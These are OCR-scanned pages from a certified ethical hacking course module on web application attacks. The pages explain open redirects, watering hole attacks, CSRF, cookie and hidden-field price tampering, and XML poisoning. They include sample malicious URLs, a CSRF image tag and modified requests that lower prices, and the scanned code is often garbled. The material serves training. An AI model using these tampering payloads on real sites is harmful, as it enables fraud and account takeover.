Unvalidated redirects enable attackers to install malware or trick victims into disclosing pa sswords or other sensit ive
information, whereas unsa fe forwards may allow access co nt rol to be bypassed

Unvalidated Redirect

0ft · · · · · · · · · · · · · ·~· · · · · · · · · · · · · · ►. ~
Attackersends an email cont aining
rewrit e link to malicious server
Attacker U ser Malicious Server
(http://www.ce rtifiedhacker.com/recirect.aspx
?=http://www.evilserver.com)

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing
passwords or other sensitive information, whereas unsafe forwards may allow access control
bypass. An attacker sends links to unval idated redirects and lures the victim into clicking on
them. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to
another site. Such redirects lead to the installation of malware and may even trick victims into
disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to
bypass security checks.
Unsafe forwarding may allow access control bypass, leading to the following:
• Session Fixation Attack

In a session fixation attack, the attacker tricks or attracts the user to access a legitimate
web server using an explicit session ID value.
• Security Management Exploits

Some attackers target security management systems, either in networks or in the

application layer, to modify or disable security enforcement. An attacker who exploits
security management can direct ly modify protection policies, delete existin g policies,
add new policies, and modify application s, system dat a, and resources.
• Failure to Restrict URL Access

An application often safeguards or protects sensitive functionality and prevents the

displays of links or URLs for protection. Attackers access those links or URLs directly and
perform illegitimate operations.

Module 14 Page 1958 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Malicious File Execution

Malicious file execution vulnerabilities are present in most applications. The cause of
this vulnerability is unvalidated input to a web server. Thus, attackers execute and
process files on a web server and initiate remote code execution, install a rootkit
remotely, and-in at least some cases-take complete control of the systems.
In an "unvalidated redirect" scenario, a user receives a phishing email from an attacker, luring
the user into clicking the link. The link (malicious query) appears to be legitimate because it
contains the name of a legitimate website such as www.certifiedhacker.com at the beginning of
the URL. However, the latter part of the link contains a malicious URL (www.evilserver.com), to
which it redirects the victim. When the user clicks the link, it redirects to the
www.evilserver.com website, and the server that hosts the website might perform illegal
activities such as harvesting the user credentials, deploying malware, and so on.
"Unvalidated forwarding" allows attackers to access sensitive pages that are generally
restricted from viewing. During unvalidated forwarding, attackers request a page from a server
with the forward (i.e., by entering a link with an embedded forward query)
http://www.certifiedhackershop.com/purchase.jsp?fwd=admin.jsp, which reaches the server
hosting the certifiedhackershop website. The server, without proper validation, redirects the
attacker to the sensitive admin page, where he/she can access purchase records, registered
users, and so on. Thus, using this technique, an attacker can successfully bypass any security
checks.
Unvalidated Redirect

Attacker User Malicious Server

(http://www.certifiedhacker.com/redirect.aspx
?=http://www.evilserver.com)

Unvalidated Forward

Attacker requests page ~

f~~.~.~~.':'.~~~'.t.~ ~.~~.~~~~
. ....... ... . . .. . . ... ..... :>
http://www.certifiedhackershop.com/
= F::::mi
- L_J
.............................. ~
Atta cker is forwa rde d
CJ Creat e item listing

purchase.jsp?fwd=admin.jsp - to admin page '!J Purchase records

Attacker Server
m Registered users

Figure 14.33 : Unvalidated Redirects and Forwards example

Types of Redirection Attacks

■ Open Redirection
Open redirection is a vulnerability that allows attackers to add their own parameters to
a URL to redirect users from trusted websites to malicious sites where they can steal
sensitive user data and redirect users back to the original website. The attacker either
simply attempts to escort the user to a fake website to enter login credentials or
redirects the user to a fake website that mimics the legitimate website through

Module 14 Page 1959 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

phishing. Such redirects can lead to credential sniffing, cross site scripting, etc. These
attacks are generally launched by exploiting the legitimate website's vulnerabilities,
through which attackers can forge URLs and inject malicious scripts using JavaScript or
PHP.

■ Header-Based Open Redirection

It is a process of modifying the HTTP location header to redirect users to a malicious

page without their knowledge. It serves the operation when JavaScript fails to interpret
the header. Users should thoroughly verify the complete URL before requesting a
resource.
■ JavaScript-Based Open Redirection

It is a process of injecting JavaScript into a web-page response received from the

corresponding web server. This type of open redirects is mostly used in phishing scams,
where users are unaware that they are navigating to a malicious website.

Module 14 Page 1960 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Watering Hole Attack

Attacker identifies the kinds of websites a target company/individual frequently surfs and tests those particular
websites to identify any possible vulnerabilities

When the attacker identifies vulnerabilities in the website, the attacker injects malicious script/code into the web
application that can redirect the webpage and download malware onto the victim machine

This attack is called a watering hole attack because the attacker waits for the victim to fall into a trap , similar to
a lion waiting for its prey to arrive at a watering hole to drink water

When the victim surfs through the infected website, the webpage redirects to a malicious server, leading to malware
being downloaded to the victim machine, compromising the machine as well as the network/organization

A
Attacker identifies the most visited ,... Victim is redirected to the
~
'.~~;:~.~•. ~.~.~".".~~~~~.~~!~~:~....... ►~
site by the victim and infects it to {.:;_ malicious server to •

. . . ......... ,> ~ ~ ··············~~.~1.~~.~~!~~;~............ "

1!1!!!!!11 ,,A

Attacker Victim Malicious Server

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Watering Hole Attack

In a watering hole attack, the attacker identifies the kind of websites frequently surfed by a
target company/individual and tests these websites to identify any possible vulnerabilities.
Once the attacker identifies the vulnerabilities, he/she injects a malicious script/code into the
web application that can redirect the web page and download malware onto the victim's
machine. After infecting the vulnerable web application, the attacker waits for the victim to
access the infected web application. This attack is called a watering hole attack, as the attacker
waits for the victim to fall into the trap, similar to a lion waiting for its prey to arrive at a
watering hole to drink water. When the victim surfs the infected website, the web page
redirects him/her and downloads malware onto his/her machine, compromising the machine
and indeed compromising the network/organization.

a . . . . ..
A
Attacker identifies the most visited
site by the victim and infects it to

':'!!'.~'..'!'! .!?~?!?.'.!.~'.'.~.....'. ........

~
r~ ~
2.-g . . . . . . Victim is redirected to the
malicious server to

.!!'.':':'.'~'.!.~'.!~'.~............. ;
~
e
•

Attacker Victim Malicious Server

Figure 14.34: Watering Hole attack

Module 14 Page 1961 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Cross-Site Request Forgery (CSRF) Attack

How CSRF Attacks Work

Cross-Site Request
Forgery (CSRF) attacks
exploit web page
vulnerabilities that allow
an attacker to force an
Cllent Side Code User logs into trusted Server Code
Symbol[:::::::==== . . •• .•• •... -~~'.:'~~ ~~i~~.~~~ -~r-~~~-~~i-~I~•• •• ·O·.. <<?php
Shares 1---~ sass ion star t O ;
if -
<form action=•buy.php• Server sets a session
me thod=•POST"> ( i ssat ($ REQUEST [ 'symbol'] ""
cookie in the user's browser iss at($ REQUE ST( ' sharas ']))
<p>Symbol: <input type:"text"
name:"symbol" /></p>
•••••• •• ••• ••• ••• ••• • •• • •• • • • • •• • •• ••• • •• ••• ••• • ••• (buy s t;;cks($ REQUEST ['symbol

unsuspecting user's •], - -

e
<p>Shares: <lnputtype:"text" Trusted
Ma licious code is $_REQUEST(, shar es•] l ; }
browser to send malicious
requests they did not
name:"shares" /x/p>
<pxlnput type:"submit"
v alue="Buy" /></p>
;
r.....................................
executed in the t ruste d server
➔
?> Server

</fo, m>r

~
intend
i' • ~=
The victim holds an active
session with a trusted site - ~::::::..~~~;~~·;;~~.;;·;·~;;~·i~~·;,;;;;···• ·····
and simultaneously visit s A tricking user to send a request to

•
User :
a malicious site, which 1. a ma licioos site . . : : : : Code
injects an HTTP request
Response page
for the trusted site into
t he victim user's session,
compromising its integrity
• t........ ~.~~~!~.s..~.~~i~!?.~.c.c:'!~ .....9 ...
:........................................................
User requests a page from
the malicious server
► ~==~~===~~:.h
:~"http: //c:artifiadhac:kar

/> Malicious
Server

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Cross-Site Request Forgery (CSRF) Attack

Cross-site request forgery (CSRF), also known as a one-click attack, occurs when a hacker
instructs a user's web browser to send a request to the vulnerable website through a malicious
web page. Finance-related websites commonly contain CSRF vulnerabilities. Usually, outside
attackers cannot access corporate intranets; hence, CSRF is one of the methods used to enter
these networks. The inability of web applications to differentiate a request made using
malicious code from a genuine request exposes it to a CSRF attack. Such attacks exploit web
page vulnerabilities that allow attackers to force unsuspecting users' browsers to send
malicious requests that they did not intend to send. The victim user holds an active session with
a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the
trusted site into the victim user's session, compromising its integrity.
In this scenario, the attacker constructs a malicious script and stores it on a malicious web
server. When a user visits the website, the malicious script starts running and the attacker gains
access to the user's browser.

Module 14 Page 1962 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Ethical Hacker
Hacking Web Applications

-•
User

:'O
:
,
. .......... ··························>:,
Logs into the trust ed site and
creates a new sessio n
Trusted Website
I

:
[ID_
•
Malicious Website

:<···············
I

,
.......... ..........A
Stores the session identifier for the V
.i
I

, -
-
-
: session in a cbokie in the web browser :

:9
:
I■ • • • • • • • • • •
:
■ • • • • • • • • • • • • • • • • • • • • • • • • • • ... • • • • • • • • • • • • • ■ • •
Visits a ma icious site :
.............. ·►.

.,.................
I
I
................>,.....................................
I
I
r················
.............. Sends a request from the user's browser
, using his session cooki e
I

Figure 14.35: Cross-Site Request Forgery (CSRF) attack example

How CSRF Attacks Work

In a CSRF attack, the attacker waits for the user to connect with a trusted server and then tricks
the user into clicking on a malicious link containing arbitrary code. When the user clicks on the
link, it executes the arbitrary code on the trusted server. The diagram below explains the steps
involved in a CSRF attack.

Client Side Code User logs into t rust ed Server Code

Symbol (;;;;;;;;;~•
............~:~~~.~~'.~!.~'.~ ~~~.~:~!!~~~ ... 0 .~ <<?php
Shares l..,_____J sessi o n_ s tart () ;
if
<form action="buy.php" Server sets a session
(isset($ REQUEST [ • symbol ' ] &&
method;"POST"> cookie in the user's browser isse t ($ REQUEST['sh are s']))
<p>Symbol: <lnputtype;;;"t ext"
name;"symbol" / ></p> {b uy_ st~ck s ($_ REQUEST [ • symbol
<p>Shares: <input type="t ext " · 1. Trusted
Malicious code is $_REQUE ST [ •sh ares • ]) ;)
na me="share s" / ></ p>
<p><input type ="s ubmit"
va lue="Buy" / ></p>
</ form>r
• !....................................
executed in t he tru st ed server
►
?> Server

~......... e ..._
<:··········································8
Attacker sends a phishing mail
·····
tricking user t o send a request to
User a malicious site Attacker

r Malicious Code

e. .
Response page
<irng
~ ••••••••~~~.t: .i~·s· '.':~!'.~i~.~~ .~~~~ ••• •• s r c =" h t t p : //certifi e dha c ker
. corn/certifiedhacke rshop . ph
····················································►
User request s a page from
p ? syrnbo l =MSFT&s hares=1000 "
Malicious
I>
the malicious server Server

Figure 14.36: W orking of Cross-Sit e Request Forgery (CSRF) attack

Module 14 Page 1963 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Cookie/Session Poisoning
How Cookie Poisoning Works
Cookies are used to maintain a session state
in the otherwise stateless HTTP protocol GET /store/buy.aspx?checkout=yes HTTP/ LO Host:
www.certifiedhackershop.com Accept: •r Referrer:
http://www.certifie dhacker.com/ showprods.aspx Cookie:
SESSION I0=3 Z 589 6ASD DZ 3SA3 58 7; Basket Si ze=3;
Modify the Cookie Content ltem1=1258; ltem2=2658; ltem3=6652; Tota1Price=l1568;
Web Server
Cookie poisoning attacks involve modifying the
contents of a cookie (personal information stored ~···········w~,;·~;;;,~·;;;~;;~·~;t·h·;;~~;;;~d·~~-~-~~d····& ········ .. ~
in a web user's computer) to bypass security sets a cookie on the user's brO'Nser
mechanisms ··O·············~;~~-b;~~~;·;~·~ ;;;~;·····························➔ =A
Inject the Mali cious Content ♦
Attacker steals ! ♦
Poisoning allows an attacker to inject the malicious
content, modify the user's on line experience, and
cookie (Sniffing,
XSS, phishing
!
! I
: ••• •
GET /sto,e/ buy.a,px?checkout=yes HTTP/ 1.0 Host,
www.certifiedhackershop.com A cce pt: •t•
Referrer:
http://www.certifiedhacke rshop.com/showprods.aspx
obtain unauthorized information attack) ~ 1 Cookie: SESSIONID=325896ASDD23SA3S87; Baske tSize=3;
lte ml=l2S8; ttem2=26S8; ltem3=6652; TotalPrice:100;

v 'i'
Rewriting the Ses sion Data
··········8 ·······;~~;~;;;;;.;~~·;,;.:;.;~·~i~~·~;,;;i~;~~·~.;;,~i~················ j
A proxy can be used for rewriting the session dat a,
displaying the cookie data, and/or specifying a new
'<!·····························································································
Product is delivered to a ttacker's address
user ID or other session identifiers in the cookie
Attacker

Copynght Cl by EC-Ctuncil All Rights Rese ive d Reproduction is Strictly Prohibite d

Cookie/Session Poisoning
Cookies are generally used to maintain a session between web applications and users; thus,
cookies need to transmit sensitive credentials frequently. The attacker can modify the cookies'
information with ease to escalate access or assume the identity of another user.
Usually, the aim of a session is to uniquely bind every individual with the web application that
he/she is accessing. Poisoning cookies and session information can allow an attacker to inject
malicious content or modify the user's on line experience and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links
to shopping cart contents, supplied private information, and session IDs. They exist as files
stored in the client computer's memory or hard disk. A proxy can be used for rewriting the
session data, displaying the cookie data, and/or specifying a new user ID or other session
identifiers in the cookie. By modifying the data in a cookie, an attacker can often gain escalated
access or maliciously affect the user's session . Many sites offer the ability to "Remember me?"
and store the user's information in a cookie so the user does not have to re-enter the data with
every visit to the site. Any private information entered is stored in a cookie. To protect cookies,
site developers often encode them. Easily reversible encoding methods such as Base64 and
ROT13 (rotating the letters of the alphabet through 13 characters) give a false sense of security
to the users who view cookies.
Threats

Compromised cookies and sessions can provide an attacker with user credentials, allowing the
attacker to access accounts and assume the identity of other users of an application . By
assuming another user's online identity, attackers can review the original user's purchase
history, order new items, exploit services, and access the vulnerable web application.

Module 14 Page 1964 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

One of the easiest examples involves using the cookie directly for authentication . Another
method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the
cookie data and/or specifying a new user ID or other session identifiers in the cookie. There are
four types of cookies: persistent, non-persistent, secure, and non-secure. Persistent cookies are
stored on a disk, whereas non-persistent ones are stored in memory. Web applications transfer
secure cookies only through SSL connections.
How Cookie Poisoning Works

Web applications use cookies to simulate a stateful user browsing experience, depending on
the end user and identity of the server side of web application components. Cookie poisoning
alters the value of a cookie at the client side before the request is sent to the server. A web
server can send a set cookie with the help of any response over the provided string and
command. The cookies are stored on the users' computers and are a standard way of
recognizing users. Once the web server is set, it receives all the requests from the cookies. To
provide further functionality to the application, cookies support modification and analysis by
JavaScript.
In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters
and submits them to the web server. The server then accepts the attacker's request and
processes it.

GET /store/buy.aspx?checkout=yes HTTP/LO Host:

www.certifie dhackershop.com Accept:•/ * Referrer:
7
http://www.certifiedhacker.com/showprods.aspx Cookie: •••••••
SESSIONID=325896ASDD23SA3587; BasketSize=3;

.
ltem1=1258; ltem2=2658; ltem3=6652; Tota1Price=11568;
VI Web Server
~............................................................ ......... '
Web server replies with requested page and
sets a cookie on the user's browser
..................................................................:> .,_.,_....-
User browses a web page A

Attacker steals
GET /store/buy.aspx?checkout=yes HTTP/LO Host:
cookie (Sniffing,
XSS, phishing ..... www.certifiedhackershop.com Accept: •/ * Referrer:
http://www.certifiedhackershop.com/showprods.aspx
attack) Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3;
ltem1=1258; ltem2=2658; ltem3=6652;Tota1Price=100;

Attacker orders product using modified cookie

~ ......................................................................................'
Product is delivered to attacker's addre ss

Attacker
Figu re 14.37: Working of Cookie Poisoning

Module 14 Page 1965 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Service Attack

J The evolution of web services and their increasing use in business offers new attack vectors in application frameworks
Web services are ba sed on XML protocols such as web services definition language {WSDL) and describe connection
points; universal description, discovery, and integration (UDDI) are used for the description and discovery of web services;
simple object access protocol (SOAP) is used for communication between web services, which are vulnerable to various
web application threats

Presentation Layer
Parameter tampering, WSDL probing, SQL/LDAP/XPATH / 0S
XML, AJAX, Porta l, Oth er
······· ·► command injection, malware injection, brute-force, data
type mismatch, content spoofing, session tampering, format
Security Layer { string, and information leakage
WS-S ecurity

Discovery Layer ..........·► Fault code leaks, permission and access attacks, error leakage,
UDDl ,WSDL authentication and certification attacks

Access Layer ···········3> Buffer overflow, XML parsing, spoiling schema, complex or
SOAP, REST recursive payload, DoS, large payload

Transport Layer
HTTP, HTTPS,JMS, Other
···········l> Sniffing, Snooping, WS-Routing, Replay Attacks, Denial•of•Seivice

Web Services Stack Web Services Attack

r- Copynght CJ by lC·CIUDCil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Web Service Attack

Similar to the way in which a user interacts with a web application through a browser, a web
service can interact directly with the web application without the need for an interactive user
session or a browser. The evolution and increasing use of web services in businesses offer new
attack vectors in an application framework. Web services are based on XML protocols such as
Web Services Definition Language (WSDL} for describing the connection points, Universal
Description, Discovery, and Integration (UDDI} for the description and discovery of web
services, and Simple Object Access Protocol (SOAP) for communication between web services,
which are vulnerable to various web application threats.
These web services have detailed definitions that allow regular users and attackers to
understand the construction of the services. Thus, web services provide the attacker with much
of the information required to fingerprint the environment to formulate an attack. Some
examples of this type of attack are as follows:
1. An attacker injects a malicious script into a web service and can disclose and modify
application data.
2. An attacker uses a web service for ordering products and injects a script to reset the
quantity and status on the confirmation page to less than what he or she had originally
ordered. Thus, the system processing the order request submits the order, ships the
order, and then modifies the order to show that the company is shipping a smaller
number of products, but the attacker ends up receiving more of the product than he or
she pays for.

Module 14 Page 1966 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Presentation Layer
Parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS
XML, AJAX, Portal, Other
•• ••••• ]>, command injection, malware injection, brute-force, data
type mismatch, content spoofing, session tampering, format
Security Layer { string, and information leakage
WS-Security

Discovery Layer Fault code leaks, permission and access attacks, error leakage,
UDDI, WSDL
--··---···:> authentication and certification attacks

Access Layer Buffer overflow, XML parsing, spoiling schema, complex or

SOAP, REST
--···--···:> recursive payload, Dos, large payload

Transport Layer
HTTP, HTTPS, JMS, Other
_ )··········:> Sniffing, Snooping, WS-Routing, Replay Attacks, Denial-of-Service

Web Services Stack Web Services Attack

Figure 14.38: Web services stacks and attacks

Module 14 Page 1967 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Service Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, business Service,
bindingTemplate, and tModel

XML Query XML Response

HTTP/1.1 ZOO OK
POST /inquire HTTP/1.1
Date: Wed, 20 Apr 2022 11:05:34 GMT
Content-Type: tut/xml; charset=utf-8 Serve r : Mlaosoft-115/7.S
SOAPAction: .... X-Powered-By: ASP.NET
Cache-Control: no-cache X-AspNet-Verstion: 1.1.4322
Pragma: no-cache cache-Control: p<tvate, max-age: 0
User-Agent: Java/1.4.2_04 Content-Type; text/xml; cha rset==utf-8
Host: uddi .microsoft.com Content-l ength: 1272
Accept: text/htm l, image/git, image/jpeg, •; q=.Z, /; q=.2 <?xml version:" 1.0N encodi~:"utf-8N ?><soap:Envelope
xmlns:soap=" http://scemas. xmlsoap.org/soap/enveloper> xlmns:xsi:"http://www.w3.0(g/2008/XMLSchema-
Connection: keep-alive
instance" xmlns:xsd:"http://wl .org/2008/x mlSchema"><soa p: Body><Servicelh t gener ic:"2.0"
Content -Length:213
operator:" Mlcrosoft COl'poration" truncated=" false" •mlns::"urn:uddi-org;apl_v2"><servlcelnfos><servicel nfo
<?xml version="l.O" e nco ding="UTF-8" ?>
ser vlceKey:a:6ad412cl-2b7c-Sabc-c5aa-Scc6ab9dc843" buslnessKey:"9112358ad-c12d-1234-d4cd-
<Enve Iop xm Ins=" http://see mas.xm Isoap.org/soap/envelope/">
c8e34e8a0aa6"><name xml:lang:"en-us">Amazon Research Pane</name></servlcel nfoxservicelnfo
<Body> servlceKey:a:"25638942-2d33-52f3-5896-c12ca5632alx" businessKey:a:"adc5c23-abcd-8f52-c.d5f-
<find_service generic=" 2.0" xmlns=" urn:uddi- 1253adcefc2a"><name xml: lang="en-us">Amazon Web Services 2.0</name></servicel nf0><servicel nfo
org: ap i_v2 " ><name >amazon</name></find_service> servlceKey=" ad8aSc78-dc8f-4S62-d4Sc-aad4Sd4S62ad"buslnesskey:"28d4acd8-d4Sc-4S6a-4S62-
</Body> acde4S67dOfS"<name xml:kang::"en">Amazon.com Web Servlces</name></servicelnfo><servlcelnfo
</Envelop> ser vlceKey="ad52a456-4dSf-7d5c-8def-<:5e6d4S6cd45 " bus lness Key="4S23 S896-256a-12 3a-c4S6-
HTTP/ 1.1100 continue add5Sa456f12"><name xml: la~="en" >Ama zonBookPrlce</name></servlcel nfo><servicel nfo
serviceKey: 9acc4Sad-4Scc-4dSc-1234-888cd4S62893" businessKey:"aa4S238d-cdSS-4d22-8dSd-
aSSa4c43adSc"><name
xml: lang::"en">AmazonBookPrlce</name></ ser vicelnfo></servlcelnfos></ser vlcel lst></soap:Body></soap:
Envelope>

Copynght Cl by EC-Ctuncil All Rights Rese ive d Reproduction is Strictly Prohibite d

Web Service Footprinting Attack

Attackers use the Universal Business Registry (UBR) as a major source to gather information
about web services, as it is very useful for both businesses and individuals. It is a public registry
that runs on UDDI specifications and SOAP. UBR is somewhat similar to a "Whois server" in
functionality. To register web services on a UDDI server, businesses or organizations generally
use one of the following structures:
■ businessEntity: holds detailed information about the company, such as company name
and contact details.
■ businessService: a logical group of single or multiple web services. Every
businessService structure is a subset of a businessEntity. Each businessService outlines
the technical and descriptive information about a businessEntity element's web service.
■ bindingTemplate: represents a single web service. It is a subset of businessService and it
contains technical information that is required by a client application to bind and
interact with a target web service.
■ technicalModel (tModel): takes the form of keyed metadata and represents unique
concepts or con struct s in UDDI.
Attackers can footprint a web application to obtain any or all of these UDDI information
structures.
XML Query
POST /inquire HTTP/1.1
Content-Type : text/xml ; charset=utf-8
SOAPAction : ""

Module 14 Page 1968 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Cache-Control : no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.rnicrosoft.corn
Accept : text/html , irnage/gif , irnage/jpeg,*; q= . 2 , /; q=.2
Connection: keep-alive
Content-Length:213
<?xrnl version="l.0" encoding="UTF-8" ?>
<Envelop xrnlns="http://scernas . xrnlsoap.org/soap/envelope/">
<Body>
<find service generic="2.0" xrnlns="urn : uddi-
org:api_v2"><narne>arnazon</narne></find_service>
</Body>
</Envelop>
HTTP/1 . 1 100 Continue

XML Response
HTTP/1.1 200 OK
Date: Wed , 20 Apr 2022 11 : 05:34 GMT
Server : Microsoft-IIS/7 . 5
X-Powered-By : ASP.NET
X-AspNet-Verstion: 1.1.4322
Cache-Control : private, rnax-age=0
Content-Type: text/xrnl ; charset=utf-8
Content-Length : 1272
<?xrnl version="l.0 " encoding="utf-8 11 ?><soap : Envelope
xrnlns : soap="http : //scernas . xrnlsoap.org/soap/envelope/">
xlrnns:xsi="http://www.w3.org/2008/XMLScherna-
instance " xrnlns : xsd=" http : //w3 . org/2008/xrnlScherna" ><soap : Body><serviceList
generic=" 2.0 "
operator= "Microsoft Corporation" truncated= "false " xrnlns="urn:uddi-
org : api_ v2 " ><serviceinfos><serviceinfo
serviceKey=6ad412cl-2b7c -Sabc - c 5aa-Scc6ab9dc843" business Key="9112358ad-c12d-
1234-d4cd-
c8e34e8a0aa6 " ><narne xrnl : lang="en-us">Arnazon Rese arch
Pane</narne></serviceinfo><Serviceinfo
serviceKey=" 25638942-2d33-52f3-5896- c12ca5632abc" business Key=" adc5 c 23-abcd-
8f52-cd5f-
1253adcefc2a" ><narne xrnl : lang="en-us " >Arna zon Web Services
2 . 0</narne></serviceinfo><serviceinfo

Module 14 Page 1969 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

serviceKey="ad8a5c78-dc8f-4562-d45c-aad45d4562ad"businesskey=" 28d4acd8-d45c-
456a-4562-
acde4567d0f5 " <name xml:kang=" en">Amazon . com Web
Services</name></serviceinfo><serviceinfo
serviceKey="ad52a456-4d5f-7d5c-8def-c5e6d456cd45"businessKey="45235896-256a-
123a-c456-
add55a456f12"><name
xml:lang="en" >AmazonBookPrice</name></serviceinfo><servi ceinfo
serviceKey=9acc45ad-45cc-4d5c-1234-888cd4562893" businessKey=" aa45238d-cd55-
4d22-8d5d-a55a4c43ad5c"><name
xml:lang="en">AmazonBookPrice</name></serviceinfo></serviceinfos></serviceLis
t></soap : Body></soap:
Envelope>

Module 14 Page 1970 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Web Service XML Poisoning

Attackers insert malicious XML code in SOAP requests t o perform XML node manipulation or XML schema poisoning t o
generate errors in XML parsing logic and break execut ion log ic

Attackers ca n manipulate XML external entity references t hat ca n lead to arbitrary file or TCP connection openings and
can be exploited for other web service attacks

XML poisoning enables attackers t o cause a denial-of-service attack and compromise confidential informa tion

XML Request Poisoned XML Request

<CustomerRecord> <CustomerRecord>
<Customer Number>2010</CustomerNumber> <CustomerNumber>2010</Customer Number>
<First Name>Jason</FirstName><CustomerNumber>
<Fir stName>Jason</Fir stName>
2010</CustomerNumber>
<LastName>Springfield</Last Name >
<FirstName>Jason</FirstName>
<Address>Apt 20, 3rd Street</ Addre ss>
<Last Name>Springfield</LastName>
<Email>jason@spr ingfield.com</Email>
<Address>Apt 20, 3rdStreet</Address>
<PhoneNumber>6325896325</PhoneNumber> <Email>[email protected]</Email>
</CustomerRecord> <PhoneNumber >6325896325</PhoneNumber>
</Cust omerRecord>

Copynght Cl by EC-Ctuncil All Rights Rese ive d Reproduction is Strictly Prohibite d

Web Service XML Poisoning

XML poisoning is similar to an SQL injection attack. It has a higher success rate in a web service
framework. Attackers insert malicious XML code in SOAP requests to perform XML node
manipulation or XML schema poisoning to generate errors in XML parsing logic and break
execution logic. Attackers can manipulate XML external entity references that can lead to
arbitrary file or TCP connection openings, which can be exploited for other web service attacks.
XML poisoning enables attackers to perform a Dos attack and compromise confidential
information. As web services are invoked using XML documents, attackers poison the traffic
between the server and browser applications by creating malicious XML documents to alter
pa rsing mechanisms such as SAX and DOM, which web applications use on the server.

XML Request
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>[email protected]</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>

Module 14 Page 1971 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

2010</CustornerNumber>
<FirstNarne>Jason</FirstNarne>
<LastNarne>Springfield</LastNarne>
<Address>Apt 20, 3rd Street</Address>
<Ernail>[email protected]</Ernail>
<PhoneNumber>6325896325</PhoneNumber>
</CustornerRecord>

Module 14 Page 1972 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Hidden Field Manipulation Attack

HTML Code
Normal Re quest
<fo:cm method:"post "
act ion•"page .aspx">
<input type='' hidden '' nam•= htt p:/ /www . certi fiedhack
Hidden Field
" PRI CE " value-" 200 . 00" > er. com/page. aspx ?pr odu c t
Product n ame: <i n put t ype= =Certif i edhac ker %: 20Shi r t Price = 200.00 Attack Request
"text" n ame="product" &pri c e =20 0 . 00
val ua•"Cartifi a dhackar
Sh irt "><hr> h t tp : //www .certifie dh ack
Product pri ce: 20 0.00"Xbr > er . com/p age. aspx? p rod u ct
<input types"submit" valu ez =Cert i f i e dhacker %20Shirt
"submit "> &pric e=2. 00
</ form>

8 When a user makes selections on an HTML page, t he selectio n is t ypically stored as form field

!
: ------ !:
Product Name [ Certifiedhacker Shirt
